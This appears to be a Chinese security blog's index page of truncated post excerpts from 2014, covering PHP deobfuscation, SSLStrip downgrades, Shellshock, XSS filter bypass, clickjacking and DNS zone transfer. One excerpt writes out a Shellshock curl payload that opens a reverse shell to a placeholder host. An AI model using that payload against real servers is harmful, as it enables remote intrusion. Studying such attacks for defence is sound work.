自己整理

admin 11年前 (2014-11-01) 1671浏览 0评论

参考资料： 1、献给写作者的 Markdown 新手指南 2、Markdown 语法说明 (简体中文版) 3、使用Markdown写作 4、简书 markdown资料   在线markdown：简书（http://www.jianshu.c...

admin 11年前 (2014-11-01) 4303浏览 3评论

php代码解密的方法可以参考：解析php混淆加密解密的手段，如 phpjm,phpdp神盾,php威盾。 今天遇到了一个简单地加密php代码，是通过多次迭代eval、preg_replace /e、eval(gzinflate(base64_deco...

admin 11年前 (2014-10-14) 3107浏览 0评论

前言 在之前介绍的流量劫持文章里，曾提到一种『HTTPS 向下降级』的方案 —— 将页面中的 HTTPS 超链接全都替换成 HTTP 版本，让用户始终以明文的形式进行通信。 看到这，也许大家都会想到一个经典的中间人攻击工具 —— SSLStrip，...

admin 11年前 (2014-10-07) 4963浏览 0评论

原文：http://sb.f4ck.org/thread-20348-1-1.html 1、google高级搜索intitle:ad.sangfor.com，这个问题几年前发现的，因为设计缺陷造成，现在搜到的结果比以前少很多了。 当然还有其他的手段，...

admin 11年前 (2014-10-06) 8363浏览 0评论

文章：mysql_real_escape_string won’t magically solve your SQL Injection problems。 该文并不是提出了某些方法来绕过mysql_real_escape_string函数来进行绕过...

admin 11年前 (2014-10-04) 30051浏览 2评论

pytesser是谷歌OCR开源项目的一个模块，在python中导入这个模块即可将图片中的文字转换成文本。 链接：https://code.google.com/p/pytesser/ pytesser 调用了 tesseract。在python中调...

admin 11年前 (2014-09-29) 4297浏览 0评论

一、命令执行漏洞分析 利用这个漏洞，需要两个条件： 服务器收到请求后，会执行bash 执行bash的时候，会将UserAgent等设置成环境变量 同时满足这两点的，一般是使用CGI的服务器，所以受到影响的服务器份额(我语文不好)不是很大。 对它进...

admin 11年前 (2014-09-25) 5883浏览 0评论

ps:利用payload curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP...

admin 11年前 (2014-09-23) 4790浏览 0评论

ps:在toUpperCase()函数中，字符ı会转变为I，字符ſ会变为S。在toLowerCase()函数中，字符İ会转变为i，字符K会转变为k。利用这些特性可以绕过xss的某些防御。 toUpperCase(): ı ==>I ſ ...

admin 11年前 (2014-09-11) 2852浏览 1评论

在做题时下载了一个centos的vm虚拟机镜像，开机发现没有网络，于是ifconfig一下发现eth0设备网络没有启动，只要lo： lo Link encap:Local Loopback inet addr:12...

admin 11年前 (2014-09-08) 2270浏览 0评论

0x00 相关背景介绍 Clickjacking（点击劫持）是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼在2008年首创的。 是一种视觉欺骗手段，在web端就是iframe嵌套一个透明不可见的页面，让用户在不知情的情况下，点击攻击者想要欺骗用户点...

admin 11年前 (2014-09-07) 3083浏览 0评论

我们知道，使用ls命令列出文件列表时，不同的文件类型会用不同的颜色显示。那么如何实现这样带颜色的文本输出呢？答案并不复杂，不管是用shell还是C语言。 一、shell下的实现方法 先来讲在shell下，如何实现。用echo命令就可以实现，参看以下...

admin 11年前 (2014-09-06) 2888浏览 1评论

本文隐藏内容 登陆 后才可以浏览 转载请注明：jinglingshu的博客 » 通用跨站脚本攻击(UXSS)...

admin 11年前 (2014-09-01) 4947浏览 0评论

VLD(Vulcan Logic Dumper)是一个在Zend引擎中，以挂钩的方式实现的用于输出PHP脚本生成的中间代码（执行单元）的扩展。 它可以在一定程序上查看Zend引擎内部的一些实现原理，是我们学习PHP源码的必备良器。它的作者是Deric...

admin 11年前 (2014-08-23) 3812浏览 0评论

一、FindFirstFile函数漏洞 1、开场 先看如下代码： <?php for ($i=0; $i<255; $i++) { $url = '1.ph' . chr($i); $tmp = @file_ge...

admin 11年前 (2014-08-08) 11444浏览 1评论

文章来源：@网络安全攻防研究室     内 网渗透在攻击层面，其实更趋向于社工和常规漏洞检测的结合，为了了解网内防护措施的设置是通过一步步的刺探和经验积累，有时判断出错，也能进入误 区。但是如果能在网内进行嗅探，则能事半功倍，处于一个对网内设置完全透...

admin 11年前 (2014-08-08) 2363浏览 0评论

今天在ubuntu server上装ci框架开发的程序代码时，访问php代码遇到下面错误，而在wamp下就不会出现该错误 通过cat /etc/issue看了下ubuntu的版本是13.10,查阅了一下资料，原来出现上述错误是ubuntu 13.1...

admin 11年前 (2014-08-07) 3612浏览 2评论

DNS区域传送（DNS zone transfer）指的是一台备用服务器使用来自主服务器的数据刷新自己的域（zone）数据库。这为运行中的DNS服务提供了一定的冗余度，其目的是为 了防止主的域名服务器因意外故障变得不可用时影响到整个域名的解析。一般来...

admin 11年前 (2014-08-07) 2342浏览 0评论

一、页面向被嵌套的iframe发送消息： <!DOCTYPE html> <title>页面向被嵌套的iframe发送消息</title> <script> function sendStat...

admin 11年前 (2014-08-06) 6759浏览 0评论

一、安装 下载地址：http://www.pyinstaller.org/。下载完成解压后，直接运行python setup.py install来安装就可以了。（可能需要安装pywin32模块：https://github.com/mhammond...